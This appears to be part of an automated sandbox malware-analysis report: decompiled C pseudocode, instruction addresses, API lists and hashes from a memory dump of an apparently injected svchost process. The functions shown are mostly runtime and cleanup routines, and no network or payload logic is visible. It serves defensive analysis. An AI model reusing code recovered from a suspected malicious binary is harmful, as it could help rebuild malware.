                                                                                                                                                                                                                                                                          0x04015cb0
                                                                                                                                                                                                                                                                          0x04015cc2
                                                                                                                                                                                                                                                                          0x04015cc9
                                                                                                                                                                                                                                                                          0x04015d7c
                                                                                                                                                                                                                                                                          0x04015d80
                                                                                                                                                                                                                                                                          0x04015d85
                                                                                                                                                                                                                                                                          0x04015d88
                                                                                                                                                                                                                                                                          0x04015d8f
                                                                                                                                                                                                                                                                          0x04015d9e
                                                                                                                                                                                                                                                                          0x04015d91
                                                                                                                                                                                                                                                                          0x04015d99
                                                                                                                                                                                                                                                                          0x04015d99
                                                                                                                                                                                                                                                                          0x04015da8
                                                                                                                                                                                                                                                                          0x04015dab
                                                                                                                                                                                                                                                                          0x04015dab
                                                                                                                                                                                                                                                                          0x04015dbb
                                                                                                                                                                                                                                                                          0x04015dbd
                                                                                                                                                                                                                                                                          0x04015dcc
                                                                                                                                                                                                                                                                          0x04015de0
                                                                                                                                                                                                                                                                          0x04015ded
                                                                                                                                                                                                                                                                          0x04015df2
                                                                                                                                                                                                                                                                          0x04015e02
                                                                                                                                                                                                                                                                          0x04015e16
                                                                                                                                                                                                                                                                          0x04015e2a
                                                                                                                                                                                                                                                                          0x04015e32
                                                                                                                                                                                                                                                                          0x04015ccf
                                                                                                                                                                                                                                                                          0x04015cd5
                                                                                                                                                                                                                                                                          0x04015d26
                                                                                                                                                                                                                                                                          0x04015d30
                                                                                                                                                                                                                                                                          0x04015d38
                                                                                                                                                                                                                                                                          0x04015ce0
                                                                                                                                                                                                                                                                          0x04015cfe
                                                                                                                                                                                                                                                                          0x04015d08
                                                                                                                                                                                                                                                                          0x04015d10
                                                                                                                                                                                                                                                                          0x04015d10
                                                                                                                                                                                                                                                                          0x04015d3f
                                                                                                                                                                                                                                                                          0x04015d44
                                                                                                                                                                                                                                                                          0x04015d4a
                                                                                                                                                                                                                                                                          0x04015d51
                                                                                                                                                                                                                                                                          0x04015d62
                                                                                                                                                                                                                                                                          0x04015d53
                                                                                                                                                                                                                                                                          0x04015d5d
                                                                                                                                                                                                                                                                          0x04015d5d
                                                                                                                                                                                                                                                                          0x04015d69
                                                                                                                                                                                                                                                                          0x04015d69
                                                                                                                                                                                                                                                                          0x04015d70
                                                                                                                                                                                                                                                                          0x04015e3a
                                                                                                                                                                                                                                                                          0x04015e3f
                                                                                                                                                                                                                                                                          0x04015e45
                                                                                                                                                                                                                                                                          0x04015e4c
                                                                                                                                                                                                                                                                          0x04015e5d
                                                                                                                                                                                                                                                                          0x04015e4e
                                                                                                                                                                                                                                                                          0x04015e58
                                                                                                                                                                                                                                                                          0x04015e58
                                                                                                                                                                                                                                                                          0x04015e64
                                                                                                                                                                                                                                                                          0x04015e64
                                                                                                                                                                                                                                                                          0x04015e3a
                                                                                                                                                                                                                                                                          0x04015e6b
                                                                                                                                                                                                                                                                          0x04015e89
                                                                                                                                                                                                                                                                          0x04015e8e
                                                                                                                                                                                                                                                                          0x04015e91
                                                                                                                                                                                                                                                                          0x04015e93
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04015e99
                                                                                                                                                                                                                                                                          0x04015eab
                                                                                                                                                                                                                                                                          0x04015eab
                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: codecvt
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3662085145-0
                                                                                                                                                                                                                                                                          • Opcode ID: 02833dcf54a586269b43c7a5692cfb048f7b9c5c918048c8dbaad8ebd72bbd88
                                                                                                                                                                                                                                                                          • Instruction ID: 8b2e742d592aba65153c7364a6cd7b1473e8eb5661a5a9f51c834e1a389ae5c1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02833dcf54a586269b43c7a5692cfb048f7b9c5c918048c8dbaad8ebd72bbd88
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87811A74E04218EFEB58DF94D894BADBBB2AF88318F148159E4057F3A1C775B986CB40
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 80%
                                                                                                                                                                                                                                                                          			E040126B0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                          				intOrPtr* _v12;
                                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                                                                                                          				intOrPtr _v44;
                                                                                                                                                                                                                                                                          				void* _v48;
                                                                                                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                                                                                          				intOrPtr* _v76;
                                                                                                                                                                                                                                                                          				intOrPtr _v80;
                                                                                                                                                                                                                                                                          				intOrPtr _v84;
                                                                                                                                                                                                                                                                          				intOrPtr _t59;
                                                                                                                                                                                                                                                                          				intOrPtr _t69;
                                                                                                                                                                                                                                                                          				intOrPtr _t70;
                                                                                                                                                                                                                                                                          				void* _t72;
                                                                                                                                                                                                                                                                          				void* _t79;
                                                                                                                                                                                                                                                                          				void* _t101;
                                                                                                                                                                                                                                                                          				void* _t102;
                                                                                                                                                                                                                                                                          				signed int _t103;
                                                                                                                                                                                                                                                                          				void* _t104;
                                                                                                                                                                                                                                                                          				void* _t105;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t102 = __esi;
                                                                                                                                                                                                                                                                          				_t101 = __edi;
                                                                                                                                                                                                                                                                          				_t79 = __ebx;
                                                                                                                                                                                                                                                                          				_v16 =  *0x429024 ^ _t103;
                                                                                                                                                                                                                                                                          				_v72 = __ecx;
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                                                                          					_v40 =  *0x426f90;
                                                                                                                                                                                                                                                                          					_v36 =  *0x426f94;
                                                                                                                                                                                                                                                                          					_v32 =  *0x426f98;
                                                                                                                                                                                                                                                                          					_v28 =  *0x426f9c;
                                                                                                                                                                                                                                                                          					_v24 =  *0x426fa0;
                                                                                                                                                                                                                                                                          					_v20 =  *0x426fa4;
                                                                                                                                                                                                                                                                          					_t59 = E04020CE0(8);
                                                                                                                                                                                                                                                                          					_t104 = _t104 + 4;
                                                                                                                                                                                                                                                                          					_v52 = _t59;
                                                                                                                                                                                                                                                                          					if(_v52 == 0) {
                                                                                                                                                                                                                                                                          						_v76 = 0;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						_v76 = E0401F4E0(_v52);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v12 = _v76;
                                                                                                                                                                                                                                                                          					E0401FC90(_t79, _v12, _t101, _t102,  &_v40, 0x14);
                                                                                                                                                                                                                                                                          					_t99 = _v12;
                                                                                                                                                                                                                                                                          					if((E04015C60(_t79, _v72, _v12, _v12) & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_v48 = 0;
                                                                                                                                                                                                                                                                          						_t99 = _v12;
                                                                                                                                                                                                                                                                          						_t69 = E0401BCB0(_t101, 3,  *_v12,  &_v48);
                                                                                                                                                                                                                                                                          						_t104 = _t104 + 0xc;
                                                                                                                                                                                                                                                                          						_v44 = _t69;
                                                                                                                                                                                                                                                                          						if(_v44 > 0) {
                                                                                                                                                                                                                                                                          							_t70 = E04020CE0(8);
                                                                                                                                                                                                                                                                          							_t105 = _t104 + 4;
                                                                                                                                                                                                                                                                          							_v56 = _t70;
                                                                                                                                                                                                                                                                          							if(_v56 == 0) {
                                                                                                                                                                                                                                                                          								_v80 = 0;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v80 = E0401F4E0(_v56);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v8 = _v80;
                                                                                                                                                                                                                                                                          							_t72 = E040070A0( *((intOrPtr*)( *_v48 + 4)));
                                                                                                                                                                                                                                                                          							_t104 = _t105 + 4;
                                                                                                                                                                                                                                                                          							_t99 = _v48;
                                                                                                                                                                                                                                                                          							E0401FC90(_t79, _v8, _t101, _t102,  *((intOrPtr*)( *_v48 + 4)), _t72);
                                                                                                                                                                                                                                                                          							if(_v48 != 0) {
                                                                                                                                                                                                                                                                          								_t99 = _v48;
                                                                                                                                                                                                                                                                          								_v60 = _v48;
                                                                                                                                                                                                                                                                          								E04020CC0(_v60);
                                                                                                                                                                                                                                                                          								_t104 = _t104 + 4;
                                                                                                                                                                                                                                                                          								_v48 = 0x666;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						_v68 = _v12;
                                                                                                                                                                                                                                                                          						_t99 = _v68;
                                                                                                                                                                                                                                                                          						_v64 = _v68;
                                                                                                                                                                                                                                                                          						if(_v64 == 0) {
                                                                                                                                                                                                                                                                          							_v84 = 0;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_v84 = E04004EA0(_v64, 1);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v12 = 0x666;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				} while (0 != 0);
                                                                                                                                                                                                                                                                          				return E04006C8C(_v8, _t79, _v16 ^ _t103, _t99, _t101, _t102);
                                                                                                                                                                                                                                                                          			}

































                                                                                                                                                                                                                                                                          0x040126b0
                                                                                                                                                                                                                                                                          0x040126b0
                                                                                                                                                                                                                                                                          0x040126b0
                                                                                                                                                                                                                                                                          0x040126bd
                                                                                                                                                                                                                                                                          0x040126c0
                                                                                                                                                                                                                                                                          0x040126c3
                                                                                                                                                                                                                                                                          0x040126ca
                                                                                                                                                                                                                                                                          0x040126cf
                                                                                                                                                                                                                                                                          0x040126d8
                                                                                                                                                                                                                                                                          0x040126e1
                                                                                                                                                                                                                                                                          0x040126e9
                                                                                                                                                                                                                                                                          0x040126f2
                                                                                                                                                                                                                                                                          0x040126fb
                                                                                                                                                                                                                                                                          0x04012700
                                                                                                                                                                                                                                                                          0x04012705
                                                                                                                                                                                                                                                                          0x04012708
                                                                                                                                                                                                                                                                          0x0401270f
                                                                                                                                                                                                                                                                          0x0401271e
                                                                                                                                                                                                                                                                          0x04012711
                                                                                                                                                                                                                                                                          0x04012719
                                                                                                                                                                                                                                                                          0x04012719
                                                                                                                                                                                                                                                                          0x04012728
                                                                                                                                                                                                                                                                          0x04012734
                                                                                                                                                                                                                                                                          0x04012739
                                                                                                                                                                                                                                                                          0x0401274a
                                                                                                                                                                                                                                                                          0x04012750
                                                                                                                                                                                                                                                                          0x0401275b
                                                                                                                                                                                                                                                                          0x04012763
                                                                                                                                                                                                                                                                          0x04012768
                                                                                                                                                                                                                                                                          0x0401276b
                                                                                                                                                                                                                                                                          0x04012772
                                                                                                                                                                                                                                                                          0x04012776
                                                                                                                                                                                                                                                                          0x0401277b
                                                                                                                                                                                                                                                                          0x0401277e
                                                                                                                                                                                                                                                                          0x04012785
                                                                                                                                                                                                                                                                          0x04012794
                                                                                                                                                                                                                                                                          0x04012787
                                                                                                                                                                                                                                                                          0x0401278f
                                                                                                                                                                                                                                                                          0x0401278f
                                                                                                                                                                                                                                                                          0x0401279e
                                                                                                                                                                                                                                                                          0x040127aa
                                                                                                                                                                                                                                                                          0x040127af
                                                                                                                                                                                                                                                                          0x040127b3
                                                                                                                                                                                                                                                                          0x040127bf
                                                                                                                                                                                                                                                                          0x040127c8
                                                                                                                                                                                                                                                                          0x040127ca
                                                                                                                                                                                                                                                                          0x040127cd
                                                                                                                                                                                                                                                                          0x040127d4
                                                                                                                                                                                                                                                                          0x040127d9
                                                                                                                                                                                                                                                                          0x040127dc
                                                                                                                                                                                                                                                                          0x040127dc
                                                                                                                                                                                                                                                                          0x040127c8
                                                                                                                                                                                                                                                                          0x04012772
                                                                                                                                                                                                                                                                          0x040127e7
                                                                                                                                                                                                                                                                          0x040127ec
                                                                                                                                                                                                                                                                          0x040127ef
                                                                                                                                                                                                                                                                          0x040127f2
                                                                                                                                                                                                                                                                          0x040127f9
                                                                                                                                                                                                                                                                          0x0401280a
                                                                                                                                                                                                                                                                          0x040127fb
                                                                                                                                                                                                                                                                          0x04012805
                                                                                                                                                                                                                                                                          0x04012805
                                                                                                                                                                                                                                                                          0x04012811
                                                                                                                                                                                                                                                                          0x04012811
                                                                                                                                                                                                                                                                          0x04012818
                                                                                                                                                                                                                                                                          0x04012830

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04012714
                                                                                                                                                                                                                                                                          • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0401278A
                                                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 040127AA
                                                                                                                                                                                                                                                                          • codecvt.LIBCPMTD ref: 04012800
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Iterator_baseIterator_base::_std::_$_strlencodecvt
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4053968246-0
                                                                                                                                                                                                                                                                          • Opcode ID: 169dd0bcd0e1bc8557198bf3e789645acc63f33ee09107aa3db1908fa965f152
                                                                                                                                                                                                                                                                          • Instruction ID: af42a25bd155b3b5d7a86e069f6b5acb66482dcb96fdedbe39403f86dc1ab7a6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 169dd0bcd0e1bc8557198bf3e789645acc63f33ee09107aa3db1908fa965f152
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4951D6B4E01208AFEB14DFA4E984BEEBBB1BF48308F108169E815B73A0D7716945CF55
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04014EC0(intOrPtr __ecx) {
                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				intOrPtr _v44;
                                                                                                                                                                                                                                                                          				intOrPtr _v48;
                                                                                                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                                                                          				intOrPtr _t55;
                                                                                                                                                                                                                                                                          				intOrPtr _t56;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v40 = __ecx;
                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_v40 + 4)) != 0) {
                                                                                                                                                                                                                                                                          					_v12 =  *((intOrPtr*)(_v40 + 4));
                                                                                                                                                                                                                                                                          					_v8 = _v12;
                                                                                                                                                                                                                                                                          					if(_v8 == 0) {
                                                                                                                                                                                                                                                                          						_v44 = 0;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						_v44 = E04006720(_v8, 1);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_v40 + 4)) = 0x666;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_v40 + 8)) != 0) {
                                                                                                                                                                                                                                                                          					_v20 =  *((intOrPtr*)(_v40 + 8));
                                                                                                                                                                                                                                                                          					_v16 = _v20;
                                                                                                                                                                                                                                                                          					if(_v16 == 0) {
                                                                                                                                                                                                                                                                          						_v48 = 0;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						_v48 = E04006750(_v16, 1);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_v40 + 8)) = 0x666;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_v40 + 0xc)) != 0) {
                                                                                                                                                                                                                                                                          					_v28 =  *((intOrPtr*)(_v40 + 0xc));
                                                                                                                                                                                                                                                                          					_v24 = _v28;
                                                                                                                                                                                                                                                                          					if(_v24 == 0) {
                                                                                                                                                                                                                                                                          						_v52 = 0;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						_v52 = E04004EA0(_v24, 1);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_v40 + 0xc)) = 0x666;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_t55 = _v40;
                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t55 + 0x20)) != 0) {
                                                                                                                                                                                                                                                                          					_v36 =  *((intOrPtr*)(_v40 + 0x20));
                                                                                                                                                                                                                                                                          					_t56 = _v36;
                                                                                                                                                                                                                                                                          					_v32 = _t56;
                                                                                                                                                                                                                                                                          					if(_v32 == 0) {
                                                                                                                                                                                                                                                                          						_v56 = 0;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						_t56 = E04004EA0(_v32, 1);
                                                                                                                                                                                                                                                                          						_v56 = _t56;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_v40 + 0x20)) = 0x666;
                                                                                                                                                                                                                                                                          					return _t56;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _t55;
                                                                                                                                                                                                                                                                          			}


















                                                                                                                                                                                                                                                                          0x04014ec6
                                                                                                                                                                                                                                                                          0x04014ed0
                                                                                                                                                                                                                                                                          0x04014ed8
                                                                                                                                                                                                                                                                          0x04014ede
                                                                                                                                                                                                                                                                          0x04014ee5
                                                                                                                                                                                                                                                                          0x04014ef6
                                                                                                                                                                                                                                                                          0x04014ee7
                                                                                                                                                                                                                                                                          0x04014ef1
                                                                                                                                                                                                                                                                          0x04014ef1
                                                                                                                                                                                                                                                                          0x04014f00
                                                                                                                                                                                                                                                                          0x04014f00
                                                                                                                                                                                                                                                                          0x04014f0e
                                                                                                                                                                                                                                                                          0x04014f16
                                                                                                                                                                                                                                                                          0x04014f1c
                                                                                                                                                                                                                                                                          0x04014f23
                                                                                                                                                                                                                                                                          0x04014f34
                                                                                                                                                                                                                                                                          0x04014f25
                                                                                                                                                                                                                                                                          0x04014f2f
                                                                                                                                                                                                                                                                          0x04014f2f
                                                                                                                                                                                                                                                                          0x04014f3e
                                                                                                                                                                                                                                                                          0x04014f3e
                                                                                                                                                                                                                                                                          0x04014f4c
                                                                                                                                                                                                                                                                          0x04014f54
                                                                                                                                                                                                                                                                          0x04014f5a
                                                                                                                                                                                                                                                                          0x04014f61
                                                                                                                                                                                                                                                                          0x04014f72
                                                                                                                                                                                                                                                                          0x04014f63
                                                                                                                                                                                                                                                                          0x04014f6d
                                                                                                                                                                                                                                                                          0x04014f6d
                                                                                                                                                                                                                                                                          0x04014f7c
                                                                                                                                                                                                                                                                          0x04014f7c
                                                                                                                                                                                                                                                                          0x04014f83
                                                                                                                                                                                                                                                                          0x04014f8a
                                                                                                                                                                                                                                                                          0x04014f92
                                                                                                                                                                                                                                                                          0x04014f95
                                                                                                                                                                                                                                                                          0x04014f98
                                                                                                                                                                                                                                                                          0x04014f9f
                                                                                                                                                                                                                                                                          0x04014fb0
                                                                                                                                                                                                                                                                          0x04014fa1
                                                                                                                                                                                                                                                                          0x04014fa6
                                                                                                                                                                                                                                                                          0x04014fab
                                                                                                                                                                                                                                                                          0x04014fab
                                                                                                                                                                                                                                                                          0x04014fba
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04014fba
                                                                                                                                                                                                                                                                          0x04014fc4

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: codecvt
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3662085145-0
                                                                                                                                                                                                                                                                          • Opcode ID: 293eff8e08c402cabf5be0573675e725eacdbb13c63a1d46bf353841e3f01ce6
                                                                                                                                                                                                                                                                          • Instruction ID: 6fde489f6c5f844b1c7bf651d9850ea7eb6d4f342482ed0b4f1dd667ca52f8cd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 293eff8e08c402cabf5be0573675e725eacdbb13c63a1d46bf353841e3f01ce6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D416E74A00209DBDB04CF94D694BEEBBF2BB48308F248199D4057B3A1D776AE85DF90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                                                                                                          			E0400CBC9(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                          				intOrPtr _t28;
                                                                                                                                                                                                                                                                          				void* _t29;
                                                                                                                                                                                                                                                                          				void* _t30;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t30 = __eflags;
                                                                                                                                                                                                                                                                          				_t26 = __edi;
                                                                                                                                                                                                                                                                          				_t25 = __edx;
                                                                                                                                                                                                                                                                          				_t22 = __ebx;
                                                                                                                                                                                                                                                                          				_push(0xc);
                                                                                                                                                                                                                                                                          				_push(0x427b08);
                                                                                                                                                                                                                                                                          				E04009CE8(__ebx, __edi, __esi);
                                                                                                                                                                                                                                                                          				_t28 = E04009556(__ebx, __edx, __edi, _t30);
                                                                                                                                                                                                                                                                          				if(( *(_t28 + 0x70) &  *0x429cb0) == 0) {
                                                                                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                                                                                          					E0400B404(_t22, 0xc);
                                                                                                                                                                                                                                                                          					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                                                                                                                                                                                                                          					_t8 = _t28 + 0x6c; // 0x6c
                                                                                                                                                                                                                                                                          					_t26 =  *0x4294d8;
                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t29 - 0x1c)) = E0400CB8B(_t8,  *0x4294d8);
                                                                                                                                                                                                                                                                          					 *(_t29 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                                                          					E0400CC33();
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						_t28 =  *((intOrPtr*)(E04009556(__ebx, __edx, __edi, _t32) + 0x6c));
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				if(_t28 == 0) {
                                                                                                                                                                                                                                                                          					E040099DE(_t25, _t26, 0x20);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return E04009D2D(_t28);
                                                                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                                                                          0x0400cbc9
                                                                                                                                                                                                                                                                          0x0400cbc9
                                                                                                                                                                                                                                                                          0x0400cbc9
                                                                                                                                                                                                                                                                          0x0400cbc9
                                                                                                                                                                                                                                                                          0x0400cbc9
                                                                                                                                                                                                                                                                          0x0400cbcb
                                                                                                                                                                                                                                                                          0x0400cbd0
                                                                                                                                                                                                                                                                          0x0400cbda
                                                                                                                                                                                                                                                                          0x0400cbe4
                                                                                                                                                                                                                                                                          0x0400cc08
                                                                                                                                                                                                                                                                          0x0400cc0a
                                                                                                                                                                                                                                                                          0x0400cc10
                                                                                                                                                                                                                                                                          0x0400cc14
                                                                                                                                                                                                                                                                          0x0400cc17
                                                                                                                                                                                                                                                                          0x0400cc22
                                                                                                                                                                                                                                                                          0x0400cc25
                                                                                                                                                                                                                                                                          0x0400cc2c
                                                                                                                                                                                                                                                                          0x0400cbe6
                                                                                                                                                                                                                                                                          0x0400cbe6
                                                                                                                                                                                                                                                                          0x0400cbea
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400cbec
                                                                                                                                                                                                                                                                          0x0400cbf1
                                                                                                                                                                                                                                                                          0x0400cbf1
                                                                                                                                                                                                                                                                          0x0400cbea
                                                                                                                                                                                                                                                                          0x0400cbf6
                                                                                                                                                                                                                                                                          0x0400cbfa
                                                                                                                                                                                                                                                                          0x0400cbff
                                                                                                                                                                                                                                                                          0x0400cc07

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0400CBD5
                                                                                                                                                                                                                                                                            • Part of subcall function 04009556: __getptd_noexit.LIBCMT ref: 04009559
                                                                                                                                                                                                                                                                            • Part of subcall function 04009556: __amsg_exit.LIBCMT ref: 04009566
                                                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0400CBEC
                                                                                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 0400CBFA
                                                                                                                                                                                                                                                                          • __lock.LIBCMT ref: 0400CC0A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3521780317-0
                                                                                                                                                                                                                                                                          • Opcode ID: 1f0354d96fabdbc1a2ba5b958ed8245a13b2cce1e2fe9863332c0abb1a1d4ff1
                                                                                                                                                                                                                                                                          • Instruction ID: 775b438eefefd3dc35736b17a6f12e75e8ac1b8e9e2c3c2db30c63f4ae9875e3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f0354d96fabdbc1a2ba5b958ed8245a13b2cce1e2fe9863332c0abb1a1d4ff1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EF06D71A19704CBF724BBA98801B8933E06B0072CF55C219C041BB2D1CB34B902CB55
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 40%
                                                                                                                                                                                                                                                                          			E0401F9F0(void* __ebx, intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				signed int _v28;
